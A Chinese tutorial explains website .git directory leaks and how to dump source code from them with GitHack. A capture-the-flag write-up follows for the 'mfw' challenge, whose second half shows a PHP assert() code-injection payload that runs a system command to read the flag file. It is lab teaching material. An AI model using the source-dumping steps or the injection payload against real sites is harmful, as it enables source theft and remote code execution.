.git 文件泄露
当在一个空目录执行 git init 时,Git 会创建一个 .git 目录。 这个目录包含所有的 Git 存储和操作的对象。 如果想备份或复制一个版本库,只需把这个目录拷贝至另一处就可以了
这是一种常见的安全漏洞,指的是网站的 .git 目录被意外暴露在公网上,导致攻击者可以通过访问 .git 目录获取网站的源代码、版本历史、配置文件等敏感信息。这种漏洞通常是由于服务器配置不当或开发人员的疏忽导致的。
如何检测 .git 文件泄露?
-
手动检测:
-
访问
http://example.com/.git/,如果返回目录列表或 200 状态码,则说明.git目录可能被泄露。
-
-
工具检测:
使用工具自动检测.git目录泄露,例如 GitHack,Gittools
安装使用GitHack
github上的githack可以把整个.git备份的文件下载下来。它能解析 .git/index 文件,并找到工程中所有的:文件名和文件 sha1,然后去 .git/objects/ 文件夹下下载对应的文件,通过 zlib 解压文件,按原始的目录结构写入源代码
我是在kali中安装使用的,下载链接
git clone https://github.com/BugScanTeam/GitHack
使用前先检查python的版本,githack要在python2中使用,我的kali装的时python3.9,但是kali本身有python2版本,使用命令
python2 GitHack.py 链接/.git
注意下载后文件夹会有一个GitHack文件,使用GitHack前先使用命令 cd GitHack
使用后在GitHack/dist中会有恢复完整的源代码。
攻防世界-WEB-mfw
启动靶机后界面如图
查看源码后发现注释有提示 ?page=flag,尝试后发现不行,然后有用dirsearch扫面
发现了.git,尝试后发现能成功访问,可以证明是git文件泄露,然后用GitHack,payload:
python2 GitHack.py My PHP Website/.git
先看flag.php文件
<?php
// TODO
// $FLAG = '';
?>
啥也没有
再查看index.php文件得到源码
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
<!DOCTYPE html>
<html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>My PHP Website</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" /></head><body><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="#">Project name</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li <?php if ($page == "home") { ?>class="active"<?php } ?>>Home</li><li <?php if ($page == "about") { ?>class="active"<?php } ?>>About</li><li <?php if ($page == "contact") { ?>class="active"<?php } ?>>Contact</li><!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>>My secrets</li> --></ul></div></div></nav><div class="container" style="margin-top: 50px"><?phprequire_once $file;?></div>我们只需要看关键部分即可
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>代码先检查url参数中是否有page参数,并将其赋值给$page,否则$page默认为home,然后再将$page拼接到%$file中
例:若$page=about,则$file=templates/about.php.
下面时对".."过滤防止目录遍历攻击,
strpos 是 PHP 的一个字符串函数,用于查找子字符串在字符串中的位置。如果file中含有".."会返回他的位置(从0开始)若返回的是4,则4===false为假,执行后面的die语句,程序结束。
若不含程序继续执行,然后检查$file是否存在,若不存在执行die语句程序结束。
assert 的参数是一个字符串,PHP会将其作为代码执行。
这就是突破口,利用这个构造payload
?page=').system("cat ./templates/flag.php");//
拼接后的代码为
assert("strpos('templates/').system("cat ./templates/flag.php");// .php', '..') === false");
前面的strpos构成闭合并且为ture,然后执行后面的命令,命令后面的内容被注释掉了不用管
得到flag
